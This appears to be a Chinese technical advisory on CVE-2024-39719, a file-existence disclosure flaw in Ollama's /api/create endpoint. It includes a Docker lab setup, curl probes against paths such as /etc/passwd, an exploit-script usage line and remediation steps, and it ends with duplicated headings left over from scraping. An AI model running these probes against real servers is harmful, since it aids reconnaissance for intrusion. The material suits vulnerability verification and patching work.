Ollama 文件存在性泄露漏洞 (CVE-2024-39719) 技术分析文档<\/h1>

漏洞概述<\/h2>
CVE-2024-39719 是影响 Ollama 0.3.14 及之前版本的文件存在性泄露漏洞，发布日期为2024年10月31日。该漏洞允许攻击者通过API接口探测服务器上特定文件是否存在，可能导致敏感信息泄露。<\/p>

漏洞技术细节<\/h2>

漏洞原理<\/h3>

漏洞存在于 \/api\/create<\/code> 端点中，当调用 CreateModel<\/code> API 并传递路径参数时：<\/p>


服务器会根据路径是否存在返回不同的错误消息<\/li>
核心问题是未正确处理用户输入，直接暴露了文件系统错误信息<\/li>
<\/ul>
影响范围<\/h3>

影响版本：Ollama 0.3.14 及之前所有版本<\/li>
<\/ul>
漏洞危害<\/h3>

作为复杂攻击的前置信息收集步骤<\/li>
探测关键配置文件、证书或敏感数据文件<\/li>
辅助进行针对性攻击<\/li>
确认特定用户存在或系统特征<\/li>
<\/ol>
漏洞复现<\/h2>
环境搭建<\/h3>
使用Docker Compose创建受影响环境：<\/p>
services<\/span>:
<\/span><\/span>  ollama<\/span>:
<\/span><\/span>    image<\/span>: ollama\/ollama:0.3.14<\/span>
<\/span><\/span>    container_name<\/span>: ollama<\/span>
<\/span><\/span>    volumes<\/span>:
<\/span><\/span>      - ollama:\/root\/.ollama<\/span>
<\/span><\/span>    ports<\/span>:
<\/span><\/span>      - "11434:11434"<\/span>
<\/span><\/span>volumes<\/span>:
<\/span><\/span>  ollama<\/span>:
<\/span><\/span><\/code><\/pre>启动命令：<\/p>
docker compose up -d
<\/span><\/span><\/code><\/pre>复现步骤<\/h3>

测试不存在的文件<\/strong><\/li>
<\/ol>
curl "http:\/\/your-ip:11434\/api\/create"<\/span> -d '{"name": "file-leak-existence","path": "\/tmp\/non-existing"}'<\/span>
<\/span><\/span><\/code><\/pre>返回结果：<\/p>
{"error"<\/span>:"error reading modelfile: open \/tmp\/non-existing: no such file or directory"<\/span>}
<\/span><\/span><\/code><\/pre>
测试存在的文件<\/strong>（如\/etc\/passwd）<\/li>
<\/ol>
curl "http:\/\/your-ip:11434\/api\/create"<\/span> -d '{"name": "file-leak-existence","path": "\/etc\/passwd"}'<\/span>
<\/span><\/span><\/code><\/pre>返回结果：<\/p>
{"error"<\/span>:"no FROM line for the model was specified"<\/span>}
<\/span><\/span><\/code><\/pre>
自动化利用脚本<\/strong><\/li>
<\/ol>
python CVE_2024_39719.py -u <ollama-server-url> [<\/span>-f <file-to-check>]<\/span>
<\/span><\/span><\/code><\/pre>脚本工作流程：<\/p>

通过\/api\/version<\/code>检查Ollama版本<\/li>
构造payload以POST方式发送到目标服务器<\/li>
分析响应判断文件存在性<\/li>
关键特征："no such file or directory"<\/li>
<\/ul>
漏洞修复方案<\/h2>
官方修复措施<\/h3>

统一错误处理，避免泄露文件存在性信息<\/li>
对用户输入路径进行严格验证和过滤<\/li>
使用通用错误消息，不暴露文件系统详情<\/li>
<\/ol>
修复建议<\/h3>

升级版本<\/strong>：升级到最新Ollama版本<\/li>
访问控制<\/strong>：限制API接口访问权限<\/li>
网络隔离<\/strong>：将服务部署在隔离网络中<\/li>
监控<\/strong>：加强对\/api\/create<\/code>端点的异常访问检测<\/li>
<\/ol>
资源链接<\/h2>

利用脚本：GitHub仓库<\/a><\/li>
<\/ul>
注意事项<\/h2>

不同版本可能返回不同错误消息<\/li>
该漏洞虽然看似简单，但可能成为更严重攻击的跳板<\/li>
建议在测试环境中验证漏洞后再进行修复<\/li>
<\/ol>
本技术文档提供了从漏洞原理到实际利用的完整技术细节，安全团队可根据此文档进行漏洞验证和修复工作。<\/p>

Ollama 文件存在性泄露漏洞 (CVE-2024-39719) 技术分析文档<\/h1>

漏洞概述<\/h2> CVE-2024-39719 是影响 Ollama 0.3.14 及之前版本的文件存在性泄露漏洞，发布日期为2024年10月31日。该漏洞允许攻击者通过API接口探测服务器上特定文件是否存在，可能导致敏感信息泄露。<\/p>

漏洞技术细节<\/h2>

漏洞复现<\/h2>

漏洞修复方案<\/h2>

漏洞概述<\/h2>
CVE-2024-39719 是影响 Ollama 0.3.14 及之前版本的文件存在性泄露漏洞，发布日期为2024年10月31日。该漏洞允许攻击者通过API接口探测服务器上特定文件是否存在，可能导致敏感信息泄露。<\/p>